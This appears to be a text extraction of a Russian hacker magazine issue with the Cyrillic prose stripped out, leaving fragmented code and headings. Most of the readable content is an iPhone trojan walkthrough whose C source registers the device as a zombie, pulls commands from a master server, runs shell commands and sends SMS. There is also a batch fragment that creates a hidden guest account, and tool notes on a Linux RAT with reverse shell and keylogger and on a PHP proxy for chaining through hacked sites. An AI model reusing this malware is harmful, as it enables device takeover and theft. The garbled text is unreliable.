rem #.jpeg .jpg .bmp .gif .pic .pict .ico .gif .html
.htm
set find_evristic_analyze_in_file_types=1
? (0\1)
set find_evristic_analyze_in_file_folders=1
?
(0\1)
set recent_folder_for_analyze=%homedrive%%homepath%\
Recent\
set no_find_documents=0 ?
set no_copy_all_documents=0 - ?
set not_attacking=0 ?
set no_use_radmin=0
?

062

if %attack_for_guest%==0 goto m3
chcp 1251
net user /active:yes

net localgroup /add


@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Winlogon\SpecialAccounts\
UserList /v /t reg_dword /d 0 /f
net user 1234


, , -
, , , , .
pqp.bat.
.
X 06 /126/ 09

>>


.
:
rem
rem
rem
rem
rem
rem
rem
rem

V
1
3
3
k
g
r
s

V133kgrs. ,
.
:
,
scanner.exe. , ?
Windows Media Player
.
MUZON.
% BASE%==BASE ,

. , ,
, .
! ,


X 06 /126/ 09

. :
BASE
DRUG
GUARD
SPY

, ,
.
.


, ,
, - , ,
. , , ,
, .
, -;
, ,
.
Radmin ,
.
. ,
, , ,
.
,
Conficker, ? , , ?
- U3 . ,
, . z

063

>>

D0ZNP
/ HTTP://OXOD.RU /


APPLE IPHONE

>>

Apple iPhone,

.
Apple iPhone.


,
,
( ). :
1. ,
"%"
2. :
at% AT-
sm%
sh% (, ls,
whoami, ping www.ru)
tg%

3.
. :
sm%79101010101%TEST is OK%<
>
4.
,
:
%ws% http- GET
%sm% SMS-

064

5. -
, :
%79102020202%
%192.168.1.100%/master-server/res.
php?res=%
:
sm%79101010101%test is OK%0%0%0%
: "test is OK"
+79101010101
sh%ping c10 www.ru%0%ws%192.
168.1.100%/master-server/res.
php?res=%
ping www.ru 192.168.1.100
tg%3600%0%0%0%0%
3600

:
,

( cat /
dev/random > /tmp/fuck-memory-economy
ls / | grep txt .). , %. , .

,
.
,
.
, ,
.



.
trojan.c . :
trojan.c main()
Makefile make

./cmd:
cmd-parser.c
cmd-parser.h
./http: HTTP-. ,
http-client.c
http-client.h
X 06 /126/ 09

>>

*((struct in_addr *)he->h_addr);


memset(&(their_addr.sin_zero),
'\0', 8);
if(connect(sockfd,
(struct sockaddr *)&their_addr,
sizeof(struct sockaddr)) == -1)
exit(1);

./sms: AT-. , IMEI CCID


sms-funcs.c
sms-funcs.h
./structs:
COMMAND
command.c

if((numbytes = send(sockfd, msg,


strlen(msg), 0)) == -1)
{
exit(1);
}

./utils: . Concat
utils-concat.c
utils-concat.h


HTTP CLIENT

int bytes = 0;
bytes = (recv(sockfd, buf,
MAXDATASIZE-1, 0));
if (bytes < 1)
{
exit(1);
}
else if(bytes<MAXDATASIZE)
{
}
else
exit(1);
close(sockfd);


HTTP.
.
, http-, ,
.
, .
: netdb.h, sys/
types.h, netinet/in.h, sys/socket.h. , :
char* sendHttpRequest(char *host,
char *url)
{
int sockfd, numbytes;
char buf[MAXDATASIZE];
struct hostent *he;
struct sockaddr_in their_addr;
char* msg[2048];
sprintf(msg, "GET %s HTTP/1.1\r\n",
url);
if (strlen(host)!=0)
{
sprintf(msg, "%sHost: %s\r\n",
msg, host);
}
sprintf(msg, "%s Cache-Control: nocache\r\nUser-Agent: bad-trojan\r\n\
r\n", msg);
int received=0;
if((he=gethostbyname(host)) == NULL)
exit(1);
if((sockfd = socket(AF_INET,
SOCK_STREAM, 0)) == -1)
exit(1);
their_addr.sin_family = AF_INET;
their_addr.sin_port = htons(PORT);
their_addr.sin_addr =
X 06 /126/ 09

return buf;
}

2
URL .
.
, - ,
:).


, ,

. :
struct COMMAND{
char ct[3];
char p1[257];
char p2[257];
char rt[3];
char r1[257];
char r2[257];
};

-,
int,

. , ,
. ,
. .
strtok,

%. :
struct COMMAND parseCmd(char *resp){
char **parsed = (char *)
malloc(SIZE);
int i=0;
for(i=0; i<SIZE; i++)
{
parsed[i] = (char*)
malloc(MAX_SIZE);
}
if (strstr(resp, "cmd: ")!=NULL) {
UCHAR cmd[1024];
strncpy(cmd,&resp[172],
(strlen(resp)-170) );
char * pch = strtok(cmd, "%");
i = 0;
while (pch!=NULL)
{
parsed[i]=pch;
pch = strtok (NULL, "%");
i++;
}
strncpy(COMMAND.ct, parsed[0],
sizeof(COMMAND.ct));
strncpy(COMMAND.p1, parsed[1],
sizeof(COMMAND.p1));
strncpy(COMMAND.p2, parsed[2],
sizeof(COMMAND.p2));
strncpy(COMMAND.rt, parsed[3],
sizeof(COMMAND.rt));
strncpy(COMMAND.r1, parsed[4],
sizeof(COMMAND.r1));
strncpy(COMMAND.r2, parsed[5],
sizeof(COMMAND.r2));
for (i=0; i<SIZE; i++) {
parsed[i] = NULL;
}
return COMMAND;
}
return COMMAND;
}

?
.
.

065

>>

. . : DF -H;
ECHO GOOD BYE; REBOOT
.

-


. , .
/dev/tty.debug, -. /dev/tty
.
115200 :
int InitConn(int speed)
{
int fd = open("/dev/tty.debug", O_RDWR | O_NOCTTY);
if(fd == -1) {
fprintf(stderr, "%i(%s)\n", errno, strerror(errno));
exit(1);
}
ioctl(fd, TIOCEXCL);
fcntl(fd, F_SETFL, 0);
tcgetattr(fd, &term);
gOriginalTTYAttrs = term;
cfmakeraw(&term);
cfsetspeed(&term, speed);
term.c_cflag = CS8 | CLOCAL | CREAD;
term.c_iflag = 0;
term.c_oflag = 0;
term.c_lflag = 0;
term.c_cc[VMIN] = 0;
term.c_cc[VTIME] = 0;
tcsetattr(fd, TCSANOW, &term);
return fd;
}

:
void SendCmd(int fd, void *buf, size_t size)
{
if(write(fd, buf, size) == -1)
{
fprintf(stderr, "SendCmd error. %s\n", trerror(errno));
exit(1);
}
}

:
AT+CMGD=1 // ,
AT+CMGF=1 //
AT+CMGW=79000000000 //
//
AT+CMSS=1 //

066

,
AT+CMGW. , ,
AT+CMSS. , .
. , ,
:).
, , IMEI
CCID. ,
:
char* getCCID(){
int fd;
fd = InitConn(115200);
AT(fd);
SendCmd(fd, "AT+CCID\r",9);
char* res = ReadResp(fd) ;
CloseConn(fd);
return res;
}
char* getIMEI(){
int fd;
fd = InitConn(115200);
AT(fd);
SendCmd(fd, "AT+CGSN\r",9);
char* res = ReadResp(fd) ;
CloseConn(fd);
return res;
}

, -.
main .



, , .
http-. IMEI
. , IMEI.
PHP .
:
int getVKey(char* imei) {
if (strlen(imei)!=15) return -1;
int vkey = 0;
int i = 0;
int c = 0;
int l = 0;
int m = 0;
char *k = (char *)malloc(1);
for (i=0; i<5; i++) {
X 06 /126/ 09

>>

:
#ECHO "FIRST"; ECHO "SECOND"; ECHO $((2+2))
switch (i) {
case 0: l = 3; m = 101; break;
case 1: l = 7; m = 107; break;
case 2: l = 8; m = 3; break;
case 3: l = 11; m = 9; break;
case 4: l = 13; m = 71; break;
}
memcpy(k, &imei[l], 1);
c = atoi(k);
vkey+=c*m;
}
return vkey;
}
int regZombie(char* imei) {
char* regurl[1024];
sprintf(regurl,"/master-server/reg.
php?imei=%s&vkey=%d",imei, getVKey(imei));
sendHttpRequest("192.168.10.1",regurl);
return 0;
}

MAIN()
.

, ,
. , :
int doCmd(struct COMMAND COMMAND){
if (strstr(COMMAND.ct, "sm")!=NULL) {
if (strlen(COMMAND.p1) > 0) {
if (strstr(COMMAND.p2, "getIMEI")!=NULL) {
sendSMS(COMMAND.p1,getIMEI());
}
else if (strlen(COMMAND.p1)==1) {
// ,
// -
sendSMS("89100000000",COMMAND.p2);
}
else {
sendSMS(COMMAND.p1,COMMAND.p2);
}
}
}
else if (strstr(COMMAND.ct, "at")!=NULL) {
if (strlen(COMMAND.p1) > 0) {
char *res[1024];
sprintf(res, "%s",getCALL(COMMAND.p1));
if (strstr(COMMAND.rt, "sm")!=NULL) {
if (strlen(COMMAND.r1)>0) {
sendSMS(COMMAND.r1,res);
}
}
X 06 /126/ 09

#DATE; UNAME A
else if (strstr(COMMAND.rt, "ws")!=NULL) {
if (strlen(COMMAND.r1)>NULL &&
strlen(COMMAND.r2)>0) {
char *urlres[1024];
sprintf(urlres, "%s%s", COMMAND.r2,res);
sendHttpRequest(COMMAND.r1,urlres);
free(urlres);
}
}
}
}
else if (strstr(COMMAND.ct, "sh")!=NULL) {
if (strlen(COMMAND.p1)>0){
system(COMMAND.p1);
}
}
else if (strstr(COMMAND.ct, "tg")!=NULL){
if (strlen(COMMAND.p1)>0){
timeout=atoi(COMMAND.p1);
}
}
return 0;
}
int main(int argc, char **argv) {
regZombie(getIMEI());
while(1) {
sleep(timeout);
COMMAND = takeCmd(1);
doCmd(COMMAND);
COMMAND = takeCmd(0);
doCmd(COMMAND);
}
}

, . ldid. ,
. .

, - . .
,

- . ,
,
, . Apple iPhone. - ,
- , - , -
. , . , http://
oxod.ru. z

DVD
dvd

.


.

HTTP://WWW
links
http://oxod.ru
.
. ,
.

WARNING
warning
!

! ,

!

067

>>

R0ID
/ R0ID@BK.RU /

>>


:XBAR V.1.2.0
: *NIX/WIN
:V01D

- FF
, ,
Firefox.
:).
Xbar v.1.2.0 V01d'a,
MD5-, PR/
ReverseIP.
Firefox:
1. DVD
2. Firefox
3. (File ->
open File -> xBar.xpi)
4.
5.


,
:
1. SEO
2. MD5

. SEO
Hide
, PR/, ReverseIP.
Enter.

.
+ IP- ReverseIP. ,
. ,
.
, General
Disable Search from file

068

.

PR/.
MD5. C
www.milw0rm.com www.hashcracking.info,
, .
:
1. ,
General Disable Search from file
2. www.hashcracking.info

3.
4.

.
:
PR/

PR/
ReverseIP
MD5-

MD5- (
)
MD5-

MD5-
www.milw0rm.com
www.hashcracking.info

, V01d'a
!

: HYBRID REMOTE
ADMINISTRATION SYSTEM
: LINUX
: CSRSS
- .
. -, Linux'

LINUX-
, ? ,

,
( ,
) .
Hybrid Remote Administration
System csrss. Linux-
:
1.
2.
3.

Perl
Perl::Gtk2
HTTP- -
BlackEnergy (PHP/MySQL)

:
Connect Back shell (not encrypted)
-.
Bind shell, port: 6666 (not
encrypted) -.
, ;

Connect Back Encrypted keylogger


.
,
rot47&RC4 .

Encrypted Remote Terminal Emulator
(E.R.T.E) SSH,
.
(rot47&RC4), .
X 06 /126/ 09

>>
. , , .
:
my $homeserver = "http://localhost/
public/getcmd.php";
#

my $defaultSleepTime = 10;
# ,


:
my $server_host = "127.0.0.1";
# , ( E.R.T.E)
my $pass = "1"; # RC4 ( E.R.T.E & Keylogger)
my $MAXLEN = 1024;
= 666;
my $LISTEN_PORT
# ,
my $SEND_PORT = 555; # ,

http-
BlackEnergy:
$prot = 0; //
? 0 FALSE, 1 TRUE
$name='cfcd208495d565ef66e7dff9f98
764da'; // md5, username, (0)
$pass='cfcd208495d565ef66e7dff9f98
764da'; // md5, password (0)
$host = "localhost"; // MySQL-
$user = "root"; // MySQL user
$pass = ""; //MySQL user password
$db = "stats"; //
$table = "bots"; //
var $timeout = 600; // ,

,


:
[E.R.T.E.]
[L.Port] Local Port ,

[L.Host] Local Host IP-


[Key] RC4
[R.Port] Remote Port
,

, .
,
.

: PPROXY
: *NIX/WIN
: BONSI
/ . ,

X 06 /126/ 09

exit;
}
?>


.
? ,
:). ,
Bouncer 3proxy, Pproxy,
. PHP,
(pproxy.php) (plocal.pl). , , ,
PHP- -
.
Pproxy :
1. pproxy.php
, , http://
site.com/proxy/pproxy.php
2. :
perl plocal.pl -px http://site.com/
proxy/pproxy.php
3. 8008,

pproxy.php
:
<?php
//$secret = 'pproxypass';
if(isset($_POST['query']) &&
isset($_POST['host']))
{
if(isset($secret) && ($_
POST['secret'] != $secret))exit;
header('Content-type:
application/octet-stream');
@set_time_limit(0);
$query = base64_decode(str_
replace(" ", "+", $_POST['query']));
list($host, $port) = explode(':',
base64_decode(str_replace(" ", "+",
$_POST['host'])));
if(!$port)$port = 80;
$ip = gethostbyname($host);
if($fp = @fsockopen($ip, $port,
$errno, $errstr, 20))
{
fwrite($fp, $query);
while(!feof($fp))
{
$answer = fread($fp, 1024);
echo $answer;
}
fclose($fp);
}

1. pproxy.php , :
http://site1.com/proxy/pproxy.php
http://site2.com/proxy/pproxy.php
2.
:
perl plocal.pl -px http://site1.com/
proxy/pproxy.php perl plocal.pl -px
http://site2.com/proxy/pproxy.php
-tpx http://localhost:8008 -bp 8009
3. 8009
4. : localhost
-> site1.com -> site2.com -> target


.
web-. .

: FORUM DETECTOR
: *NIX/WIN
: DX



dx Forum Detector.
,

. ,
IPB, phpBB, vBulletin, MyBB
.
:
( IPB, phpBB, vBulletin, MyBB)





PR ,

/socks5/ /socks5

,
- .
-
.z

069

>>

BATTLE
OF THE BRAINS
ACM ICPC 2009
21 2009
ACM ICPC, IBM.
,
.

, , ,
(Bill Poucher),
(Baylor University)
ICPC.
.
,
.
,
, ,
.
,
,
, ,
.


,
.

070

,
,
.
:
,


.

8
: ( ),
(
), , , ,
, - .
MIT, , , , .
:
,
:).

- : ,
.


KTH . 9
21 .

11 ,
:


.
5 9
11 :
. :
1381

!
X 06 /126/ 09

>>

:

.
: .
, , . ,
.
, ,
.
,
.
.
,
.
, 10:00am, 10:05am
10:15am, 5 : .

.

:
Input- ,
.
n (2<=n<=8), . n ,
[ai, bi] , i-
. ai, bi
: 0 ? ai ? bi ? 1440. 0.

:

( ).

X 06 /126/ 09

071

>>

HTTP://WWW
links
icpc.baylor.edu

.

-,


.
www.snarknews.info

.
www.topcoder.com


.
www.opencup.ru

.
google.com/
codejam codejam,
google.
acm.timus.ru
,
.



.

DVD
dvd


,

ACM ICPC
2009 .

072

X 06 /126/ 09

>>

,
(-)

1381

TSINGHUA UNIVERSITY

1800

1176

1305

UNIVERSITY OF OXFORD

998

ZHEJIANG UNIVERSITY

1117

MASSACHUSETTS INSTITUTE OF
TECHNOLOGY

1143

1254

UNIVERSITY OF WARSAW

1413

10

UNIVERSITY OF WATERLOO

787

11

I. JAVAKHISHVILI TBILISI STATE


UNIVERSITY

933

12

CARNEGIE MELLON UNIVERSITY

1045

X 06 /126/ 09

073

>>

z
. :
?, ?. ,
, , ,
. , ,
.


:
, , ...
,
(
,
)
, (
!).
Its a joke, , :). , ,
:

McAfee,
HIPS/IPS-

074

( Endeavor Security, ,
);
;

;
;
,
.
, ,
z, .
- ?!
.

- , ,-
. ...
- ! .

!
.
.

,
.
, ,
,
,
,
X 06 /126/ 09

>>


,
, .
7500 . , .



,
. 35 ! ,
35,
, .
, . ,
. ,
( ),
, .
,
.
,
, . ,
.
,

, ,
,
. , . ,
, ,
. . , ,
.
,
,
. ,
, ,
,
. ,
.

, ,

, , .
X 06 /126/ 09

? ?
!
. .
, ,
.
.
,
?!
, ,
. -,
, .

, , ,
. ,
.
, ,
,
, .
. .
. , Twin-Towers
( )
, , ,
,
. : ,
, , .
! , , .
. , ,
very special stuff, not a drug.

, , , , not a
drug . ,
.
, .

,

, . ,
, . ,
, .
,
( )
.
.
,
.
, , ,
.
, .
, ,
,
. . -
.
,

,
. , , ,
.
.

075

>>
-

, .
, .
, . , , . , . , . , (,
, ) OpenBSD,
HiFi-,
. , ,
. , .

, ,
, HIEW ,
.
, , .
,
. Wi-Fi,
.

076

,
, , .
, HITB (Hack In The Box),
.
Intel,

, , , .

P.S.
From: Kris Kaspersky
To: andrushock@real.xakep.ru
Subject: Re[16]:

!
. .
. ;-( .
, . z
X 06 /126/ 09

>>
WHAT ARE YOU DOING?

,
140

.com

Twitter -
, twitter-
, .
Twitter , . ?
, , -

Twitter
.

15 , ,
, -http- ,
Usenet,
.
.
, LiveJournal () .

.
,
( ,
, ,
MySpase Facebook). ,
,
, Twitter.
, ,
,
?
, .

078

IM (instant
messenger) 2006 IT-:
(Jack Dorsey), (Biz Stone)
(Evan Williams).
, , , ,
.
32 ,
. 14 ,
,
.
open sorce , ,
, . 2000- ,
,

.
, , ,
. , ,
,
2000- .

LiveJournal
,
4.136. ,

, ,
:
,
.

. ,

,
AIM (AOL Instant
Messenger), :).

.

,
. ,
2005 ,
Odeo Inc.

Odeo
, X 06 /126/ 09

>>


Twitter Inc.

Twitter

X 06 /126/ 09

The Crunchies 2008

Twitter

079

>>

FAIL WHAIL TWITTER


,

Twitter:
(,
):
http://twitter.com/George_Lucas
(-, ,
): http://twitter.com/neilhimself
(-,
):
http://twitter.com/GreatDismal
Limor Fried AKA Lady Ada (,
Open Source Hardware):
http://twitter.com/adafruit
( , Apple):
http://twitter.com/stevewoz
(CEO Apple
Inc.):
http://twitter.com/SteveJobs
( , ):
http://twitter.com/stephenfry
( digg.com):
http://twitter.com/kevinrose
(, , , ):
http://twitter.com/ThatKevinSmith
():
http://twitter.com/Jon_Favreau

080

.
.
( iTunes )
, , , .
, ,
,
,
.
,

,
. Twitter
140
SMS .
. ,
Xanga Blogger,
. ,
:
, .
, , Twitter ,
. 50 ,
,
.
,
, , !
, ,

,
, .
- , ,
.
, , , ,
, . , ,
,
.

stat.us.

,

,
TWITTER :)
.
Twttr ( .
twitter ),
Flickr, ( , SMS- ,
, ).
Twttr.com -
. ,
Twitter.
com - .
, Odeo .

. Twitter ,
, , .
, ,
, , Twitter,
.
SMS-, ,
.


. ,
Twitter.
com Odeo, Twttr
, Twitter.
?, .

IT- .
Twitter -, Odeo
.
-,
.

Pyra Labs Blogger.com.
, Pyra Labs
Google,
Odeo.
, ,
-
. Twitter , ,
Odeo
Obvious Corp.

TWITTER-

-
2006 2007 . X 06 /126/ 09

>>

TWITTER


-
Twitter, .

Twitter ,
.
.
, (oh this is
going to be addictive), 2006
.
, ,
, South by Southwest.
, ,
Twitter ,
. SXSW
,

, , . Twitter ,
SXSW
. - ,

Twitter. ,

best blogging tool , , .
Twitter
.
2007 ,
MTV Music Awards Apple WWDC 2007, SXSW, Twitter .


. Twitter ,

. , .
,
, X 06 /126/ 09

. , 2007
Twitter 98%
, 7
. downtime twitter.
com
, , fail whail
, .
: ! , .
, ,
.


2008 ,

Amazon S3. , 2008-,
Twitter .
,
,
. ,
Obvious Corp
Twitter Inc.,
, Obvious

Odeo. Twitter
. ,
(,
,
:)).
Union
Square Ventures, Charles River Ventures, Digital
Garage, Spark Capital,
Bezos Expeditions,
Amazon.com.

,

. Twitter , RSS-,
. ,
.

Twitter, , .

(
twitter-), -
.

43%!

.
, ,
Twitter,

.
, ,
.
Twitter Inc. 30 ,
, ,
250
. Twitter ,
, , www.twitter.jp,
. ,

-, . - Twitter ,
. ,
,
twitter-, ,
, SMS.

081

>>
, ,
. Facebook
Twitter ,
, .
Twitter
, , Facebook
.
, Twitter
Google, .
, ,
, - (-,
,
).
,
Twitter
.
, Twitter

(Facebook MySpace ), 1382% ,
.


, , ,

. Twitter
,

?
, ,
. , , Twitter
.
(
140 ). ,
Twitter , , ,

.

,
, 2008 , ~80
5 , ,

.
1549, 2009 , -
Twitter
,
. Twitter
, 2009


.
.

82
082

, STAT.US

Twitter ,

,
. ,
( . follow
-. Twitter
): ,
, (, ,
), , , , ,
... Twitter
,
. ,
Twitter
,
.
, 24%, 2
100.000 .


. , ,
, ,

. ,
, ,
, ,
- .. . .
140 Twitter, . ,
,
, ,
.
, - SMS
, ,
1337, .
Twitter , ,
, .
, , , ,
Twitter ,


Twitter ,
Ruby on
Rails, , ,
.
\ 140
( SMS +
).

web-, SMS,
.

.
,
, SMS, RSS, twitter-
.
, Twitter 6
. 55 .
.
Twitter 5
10 .

, .
,
,
, ,
. twitter-
:

Twitter. -
(
,
, ,

,
). , 140
.z
X 09 /117/ 08
X 06 /126/ 09

>> unixoid

J1M
/ ZOBNIN@GMAIL.COM /

Linux FreeBSD

>> unixoid

UNIX- ,
- , ,
. :
,
LiveCD,
, . UNIX
, ,
.
,
:
1. . MBR,
root.
2. . , .
3. . ,
.
4. .
xorg.conf, , .
5. . , .
6. . , DNS-.

.


MBR

084


, FAQ
.
Linux,
. , : Linux
LiveCD,
:
$ sudo grub-install /dev/sda



. grub-install !
grub:
$ sudo grub

find /boot/grub/stage1,
grub,
,
/boot/grub. :
: root _
: setup (hd0)
: quit


FreeBSD,
.
MBR :
1. FreeBSD.
2. Fixit, CDROM/
DVD.
3.
boot0cfg -o packet ad0 && exit.
4. Reset.
MBR .
X 06 /126/ 09

>> unixoid

FREEBSD
root.
, ,
,
, ,
.
vipw.
Linux

single. grub ,
e,
single <Enter>. /bin/sh
. vipw,

root, exit.

FreeBSD, 4 boot -s .



ACPI BIOS .

; Linux FreeBSD
,
, . ,
-
, ,
ASUS
. ACPI IO-APIC -:
,
, MP-BIOS
bug: 8254 timer not connected to IO-APIC,

.
.
,
APIC / ACPI . Linux

grub, e, X 06 /126/ 09

noapic b.
/boot/grub/
grub.conf noapic ,
kernel.
, ACPI
acpi=off. FreeBSD 2, ,
, hint.
apic.0.disabled=1 loader.conf:
# echo "hint.apic.0.disabled=1" >>
/boot/loader.conf



, .

, ,
.

!

. ,
, :
$ tar -czf ~/src.tar.gz /usr/src &&
tar -xzf ~/src.tar.gz


,
.
( )
memtest86. ,
.
grub
LiveCD Linux. memtest86.
.
memtest86
,
. memtest86 , ,
,

, .

,
,
. , ,
. ,
,
.


, .
, /sys Linux sysctl
FreeBSD.


nvclock. -s,
GPU:
# nvclock -s

100 :
# nvclock -n 300


, ,
,

.
,
,
. ,
,
S.M.A.R.T., , .
*nix- ,
smartctl.
smartmontools,
smartctl, Linux, FreeBSD
(sysutils/smartmontools).
smartctl:
# smartctl -A /dev/sda

: Reallocated_Sector_Ct
Temperature_Celsius.
. , ,
. ,

. Temperature_
Celsius
, 50-
(36-45 ).
S.M.A.R.T. ,
. ,

085

>> unixoid
GRUB
FREEBSD
IFCONFIG

INFO

info
,



.



.



Linux
,
quiet splash
,
e
grub.

, Google, ,
60%
S.M.A.R.T., - . , ,
-
? dmesg I/O error,
cp .

dd ( /dev/sda
, /dev/sdb ):
# dd if=/dev/sda of=/dev/sdb conv=noerror,sync

,
dd , .
fsck . ,
dd .
,

! dd ,
. dd_rescue,
:
, .

. :
# dd_rescue -v -y 1G -l sda.log -o sda.bb \
/dev/sda /dev/sdb

, <Ctrl+C>, , :
# dd_rescue -r -v -y 1G -l sda.log -o sda.bb \
/dev/sda /dev/sdb

.
,
.
gpart:
# gpart -W /dev/sda /dev/sda

gpart testdisk, - .

086

grub
FreeBSD. boot0. /boot/grub/menu.lst
:
title FreeBSD
root (hd0,0)
chainloader +1

X
X.org ,
. X- ,

.
, . X- .
,
.
,
, .
, /tmp.
,
X- startx ,
.
,
,
/var/log/Xorg.0.log:
# grep EE /var/log/Xorg.0.log

, X-
(EE), ,
.
,
, X -configure,
X.org.
, X- .
, . (KDE4, )

.
,
2D/3D-. , nvidia- nv. ,
nvidia.com

.


Linux FreeBSD
.
,
, .
X 06 /126/ 09

>> unixoid
PCICONF:
,

GPART
Linux FreeBSD ,
. ,

, , .

, ,
. :
,
.
PCI
.
lspci Linux pciconf
FreeBSD:
linux# lspci -v
freebsd# pciconf -l -v


().
Kernel modules:,
.
nfe0
( )
nfe. none
, ,
.

google,
, .
,
/ ,
.

NDISWrapper,
Linux.
NDIS (Network Driver Interface Specification),
Windows.
ndiswrapper, Windows, INF-
:
# ndiswrapper -i driver.inf
X 06 /126/ 09


TESTDISK
, :
# ndiswrapper -l

? :
# modprobe ndiswrapper


Linux.


DHCP. .
- dmesg | less Linux
less /var/run/dmesg.boot FreeBSD
,
. :
nfe0: <NVIDIA nForce2 MCP2 Networking Adapter>
port

( Linux
eth0 eth1). ifconfig
.
, ;
inet , IP-. :
# ifconfig inet IP- netmask
- up


,
. ,
- , :
# route add default gw IP-

PPPoE PPTP- .

PPP, 2008 . .
! z

HTTP://WWW
links


www.sysresccd.org.


gpart www.brzitwa.
de/mb/gpart.
Testdisk

www.
cgsecurity.org/wiki/
TestDisk.

dd_rescue www.
garloff.de/kurt/linux/
ddrescue.
nvclock
www.linuxhardware.
org/nvclock.

NDISWrapper

Windows
sourceforge.net/
projects/ndiswrapper.

087

>> unixoid
LinuxMCE

Smart Home

LinuxMCE

BOBER
/ ZLOY.BOBR@GMAIL.COM /

Smart Home

LinuxMCE:
(Smart Home)
, . ,
. , -,
. .

>> unixoid

LINUXMCE
LinuxMCE (www.linuxmce.org)
Linux Media Center
Edition. ,


(Home Theater
PC, HTPC). LinuxMCE
Home Automation System, !

, (, )

( ),
- .
,
TCP/
IP, X10, INSTEON, PLCBus, EIB/KNX, Z-Wave
1-Wire.

088

( TCP/
IP ).
,
,
,

.
-,
IP-, ,
.
. ,
,
(, , ..)
.


Motion,
, z 2008 .


/ ( ,
).

. ,
,
(
, SMS,
..). , LinuxMCE
.
LinuxMCE
X 06 /126/ 09

>> unixoid
Asterisk.

FreePBX (www.freepbx.org)
, VoIP,
. LinuxMCE
-
( PCI-
- Digium TDM410P FXO . .),
(Xlite, Bria, Ekiga) IP-.

LinuxMCE . follow-me ( ),
,
, .

Bluetooth (GPRS/WAP),

.
HTPC, -,

(, , ,
-, ) , , IR (
GC100) Bluetooth. ,
SlimServer (
SqueezeCenter) Smart Home.
2007
,
Ubuntu (
DRM)
Plutohome (
Debian). LinuxMCE
Kubuntu.

KDE .
, MCE
Kubuntu. , 0704, Kubuntu 7.04, 2007
(Kubuntu ), 0710
2008. ,
LinuxMCE Kubuntu,
. 0810
,
KDE 4.x.
, , 0810 ( , KDE)
.

SMART HOME LINUXMCE


,
, ,
,
LinuxMCE.
( ) Core.
,
X 06 /126/ 09

.
IP-, ,
, TV- .
Core ,

.
, .
,

NAS-. Core
() ,
Media Director.
Media Director ( Media Station)
, ,

.
(
Kubuntu), (PVR),
.

: ,
. , -


.
, LinuxMCE, wiki.
linuxmce.org/index.php/Category:Orbiters. ,
Nokia770/7650/6620/N800/N810, IPAQ 2210/5550/
hx2410, Cisco 7970 (XML-Orbiter) .

Ruby. Orbiter
. ;
,
.

LINUXMCE

,
wiki.linuxmce.org/
index.php/Hardware. , Core
Media Director .
, Core
Pentium-III 733
256 RAM 4 ( ,

MEDIA DIRECTOR , ,
.
( KUBUNTU),
(PVR),
..
,
. Smart Home Media
Director,
.
Core- (Hybrid), Media Director.
Hybrid ,
.
Media
Director
Orbiter.
: -, ;
, (
Symbian Microsoft Mobile)
; ,
WiFi. ,
Media Director ,

8,5 ). Media Director ,



. LinuxMCE NVidia (GeForce
6200 GeForce 8500). TV-
(
,
USB).

0710
32- 64- Kubuntu 7.10 (Gutsy
Gibbon).
.
,
*Ubuntu 7.10,
.

.

089

>> unixoid
INFO

info

LinuxMCE
,


Kubuntu.

LinuxMCE
Pluto (plutohome.
com).
GPL,

.
LinuxMCE

: If youre
using a Media Center
PC, its all about the
media, stupid, not the
PC.

LinuxMCE Kubuntu <Ctrl+Alt+F7>
<Ctrl+Alt+F11>
LinuxMCE.
25 2009
*Ubuntu 7.10.


CORE HYBRID


IP-.
Kubuntu 7.10, CD, LinuxMCE-CD1-i386rc2.iso LinuxMCE-CD2-i386-rc2.iso ( 64-
amd64).
LinuxMCE.
-
(, ,
),
LinuxMCE .
DVD-.
3,9 Dual Layer 7,0 .
- . ,
, .
DVD , :

linuxmce, SSH.
.
, .
; , (
).
CD .
. Kubuntu 7.10,
CD1 LinuxMCE /mnt:
$ sudo mount LinuxMCE-CD1-i386-rc2.iso /mnt -o loop



LinuxMCE
svn co
http://svn.linuxmce.
com/pluto/trunk/
linuxmce.
MythTV


2007 .

090

mceinstaller:
$ sudo dpkg -i /mnt/mce-installer_2.0.1-1_i386.deb

Install
LinuxMCE. , . ,
. ,
.
.
,
LinuxMCE ( ),
Ubuntu. , , .
,

DVD-
LINUXMCE

DVD
, .
, DVD- . :
, , ,
.
(, /dev/sda1), Linux,
/etc, pluto.conf.
/etc/pluto.conf .

Hybrid (
Yes) Core (No, ).
NVidia,

( CD1). .
DHCP.
No, ill set my network options manually . ,
(
). DHCP, IP- 192.168.80.1192.168.80.254. . , LinuxMCE ,
DHCP .
, .

:
Primarily used as a PC
Kubuntu, LinuxMCE;
A dedicated LinuxMCE .
, , Media Director
.
. , CD1/CD2 Kubuntu 7.10 Desktop.

ISO-,
, .
Its in CD Drive,
. , .
Error,
, .
.


,
.
AV
X 06 /126/ 09

>> unixoid

HOUSE SETUP
WIZARD

- LINUXMCE
ADMIN WEBSITE


Wizard. ,
. Kubuntu
,
LinuxMCE. LinuxMCE, Advanced
A/V Wizard ( /usr/pluto/bin/
AVWizard_Run.sh).
(VGA, DVI/HDMI, S-Video
), .

Orbiter User Interface
(UI). Static images, no overlay
(lightweight)
.
OpenGL with alpha blending
(high-end) NVidia 6/7/8/9xxx 128
. OpenGL
Test. Adjust Image Size
. ,
,
, Dolby DTS (Digital Theater
Sound)
.
. . ,
I agree ,
.
. Primarily
used as a PC, KDE,
LinuxMCE Launch
Manager. ,
X 06 /126/ 09

LINUXMCE
A/V WIZARD

MCE, .
LinuxMCE Start Start
LinuxMCE Start Core services,
, Core.
Launch Manager Autostart Settings.
,
, House Setup Wizard (
Misc
Advanced Options Setup Wizard).
; , , Next
.
: House Setup Wizard Media
Player Wizard. , ,
,
, , , VoIP- PVR-
(MythTV VDR).
, Continue without one.

. Media Player Wizard
.

(w32codecs, DVD CSS ). -
, Dont control my
. ,

( ). Start using
the system. Kubuntu
KDE Desktop <Ctrl+Alt+F7>;
LinuxMCE <Ctrl+Alt+F11>.
LinuxMCE Admin Website, , http://core_ip/
pluto-admin Launch Manager.
,
,
Windows .

HTTP://WWW
links

LinuxMCE
linuxmce.org.
WiKi
LinuxMCE

wiki.
linuxmce.org.

LinuxMCE
linuxmce.ru.
-

hosm.ru.

WARNING
warning
DVD LinuxMCE


,
.

LinuxMCE , ,
, .
,

! z

091

++++

>> coding

++++
SPIRIT

++++

/ HTTP://TUTAMC.COM /

ROMEO

INTERNET

MONTAGUE
.NET

++++

JULIET

++++
KOARL

++++

WASINET
.ORG
FRANZ

CAPULET
.COM

PETER

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

++++

++++

++++

